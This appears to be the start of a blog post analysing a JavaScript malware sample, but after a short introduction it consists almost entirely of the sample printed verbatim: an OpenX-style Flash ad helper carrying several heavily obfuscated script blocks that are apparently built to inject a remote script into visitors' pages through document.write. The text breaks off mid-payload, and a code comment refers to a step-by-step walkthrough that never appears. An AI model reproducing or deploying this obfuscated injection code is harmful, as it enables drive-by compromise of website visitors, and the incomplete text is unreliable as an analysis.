A couple of weeks ago, a friend dropped me a sample of some malware that he encountered in his network (thanks
@0daySimpson). It's written in JavaScript, and although most of it is fairly intelligible, there's a lovely section of obfuscated code that hides its intent very effectively. The challenge? Figure out what it does, of course! He asked for my assistance with analyzing the script, so that's just what I did. Here's how it went.
Step 1: Prettify the Code
When I first got my hands on the sample, it looked like this (WARNING: long block of code ahead!):
// Minified OpenX-branded SWFObject helper, kept verbatim as found in the sample (the
// reformatted copy is walked through step by step further down). In order it defines the
// org.openx namespace objects, the org.openx.SWFObject constructor and its prototype
// (getSWFHTML builds <embed>/<object> markup by string concatenation; write() assigns it
// to a container's innerHTML), SWFObjectUtil.getPlayerVersion (probes navigator.plugins,
// then falls back to ActiveXObject("ShockwaveFlash.ShockwaveFlash.*"); the v6 ActiveX
// branch sets AllowScriptAccess="always"), PlayerVersion/versionIsValid,
// util.getRequestParameter (reads document.location.search/hash), cleanupSWFs plus the
// onbeforeunload hook, the FlashObject/SWFObject aliases, and finally the empty
// OX_0f4f918e string. The lines that follow append HTML fragments to that string —
// several <script> blocks written entirely in $, _ and punctuation, an ad <a>/<img>,
// and a FlashObject(...) invocation with allowScriptAccess=always — and the last line
// hands the whole thing to document.write().
if(typeof org=="undefined"){var org=new Object();}if(typeof org.openx=="undefined"){org.openx=new Object();}if(typeof org.openx.util=="undefined"){org.openx.util=new Object();}if(typeof org.openx.SWFObjectUtil=="undefined"){org.openx.SWFObjectUtil=new Object();}org.openx.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=org.openx.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new org.openx.PlayerVersion(_5.toString().split(".")));}this.installedVer=org.openx.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){org.openx.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};org.openx.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var 
_19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new org.openx.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof 
_20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};org.openx.SWFObjectUtil.getPlayerVersion=function(){var _23=new org.openx.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new org.openx.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new org.openx.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new org.openx.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new org.openx.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};org.openx.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};org.openx.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};org.openx.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return 
"";}};org.openx.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(org.openx.SWFObject.doPrepUnload){if(!org.openx.unloadSet){org.openx.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",org.openx.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",org.openx.SWFObjectUtil.prepUnload);org.openx.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=org.openx.util.getRequestParameter;var FlashObject=org.openx.SWFObject;var SWFObject=org.openx.SWFObject;document.mmm_fo=1;var OX_0f4f918e = '';
OX_0f4f918e += "<"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a
.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+
\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt-->\n";
OX_0f4f918e += "<"+"div id=\'ox_64ea63b5f76eb3c481ad44a961e2c479\' style=\'display: inline;\'><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\
"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a.$$_+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a.__$+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a._$$+\"\\\\\"+$a.__$+$a.__$+$a.__$+\"\\\\\"+$a.__$+$a.___+$a.$_$+\"\\\\\"+$a.$__+$a.___+\"\')>\"+$a.___+\")\\\\\"+$a.$__+$a.___+\"{\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"=\"+$a.__$+\";\"+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\"=\'__\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\"+$a.__$+\";\\\\\"+$a.$__+$a.___+$a.$$$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"=\\\\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+\",\\\\\"+$a.$__+$a.___+$a.___+$a.__$+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+\"\\\\\"+$a.$__+$a.___+$a.___+$a.___+\":\"+$a.___+$a.___+\":\"+$a.___+$a.___+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a._$_+$a.$_$+\"\\\\\"+$a.__$+$a._$_+$a.$__+\"\\\\\"+$a.__$+$a.___+$a._$$+\";\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"=/\';\"+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+\"\")[$a._$_]+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"(\\\\\\\"<"+"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\"\\\\\"+$a.$__+$a.___+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"=\'\\\\\"+$
a.__$+$a.$_$+$a.___+$a.__+$a.__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"://\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\".\"+$a.$_$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$$$+$a._$_+\"/\"+$a.___+$a.$$__+$a.$$__+$a._$_+$a._$_+$a.$$$+$a.$_$+$a.$$_+\".\\\\\"+$a.__$+$a.$_$+$a._$_+\"\\\\\"+$a.__$+$a.$$_+$a._$$+\"?\"+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a.___+\"=\"+$a.$_$_+$a.$$_$+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$_$_+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"-\\\\\"+$a.__$+$a.$$_+$a._$$+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.__$+\".\"+$a.$$__+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+\"\'><"+"/\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\\\"+\\\\\\\"\\\\\"+$a.__$+$a.$$_+$a.___+$a.__+\">\\\\\\\");}\"+\"\\\"\")())();}catch(e){}<"+"/script><"+"!--ffnqt--><"+"a href=\'http://ad.same-story.com/delivery/ck.php?oaparams=2__bannerid=155__zoneid=9__cb=956c2f8948__oadest=http%3A%2F%2Fhome.edt02.net%2Femc%2Fbanner%2Fmstbc.php%3Fc%3D40060-195305-99922-0-335287\' target=\'_blank\'><"+"img src=\'http://ad.same-story.com/images/9b4c7c85bcd76a4593020663b97f5dec.gif\' width=\'300\' height=\'250\' alt=\'\' title=\'\' border=\'0\' 
/><"+"/a><"+"script>try{$a=~[];$a={___:++$a,$$$$:(![]+\"\")[$a],__$:++$a,$_$_:(![]+\"\")[$a],_$_:++$a,$_$$:({}+\"\")[$a],$$_$:($a[$a]+\"\")[$a],_$$:++$a,$$$_:(!\"\"+\"\")[$a],$__:++$a,$_$:++$a,$$__:({}+\"\")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+\"\")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+\"\")[$a.__$])+((!$a)+\"\")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!\"\"+\"\")[$a.__$])+($a._=(!\"\"+\"\")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!\"\"+\"\")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+\"\\\"\"+$a.$$_$+\"=\"+$a.$$_$+$a._$+$a.$$__+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\"+$a._+$a.$_$_+\"=\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a.$$_+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\".\"+$a._+\"\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+\"\\\\\"+$a.__$+$a.___+$a.__$+\"\\\\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.__+\";\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+\"(\"+$a.$$_$+\"._\\\\\"+$a.__$+$a.$$$+$a._$_+\"\\\\\"+$a.__$+$a.$$$+$a.___+\"===\"+$a._+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a.$$_$+\".\"+$a.$$__+$a._$+$a._$+\"\\\\\"+$a.__$+$a.$_$+$a._$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'_\"+$a._+$a.__+\"\\\\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+\"=\')==-\"+$a.__$+\"\\\\\"+$a.$__+$a.___+\"&&\\\\\"+$a.$__+$a.___+$a._+$a.$_$_+\".\\\\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+\"\\\\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+\"\\\\\"+$a.__$+$a.$_$+$a.___+\"(\'\\\\\"+$a.__$+$a._$_+$a.$$$+\"\\\\\"+$a.__$+$a.$_$+$a.__$+\"\\\\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+\"\\\\\"+$a.__$+$a.$$_+$a.$$$+\"\\\\\"+$a.__$+$a
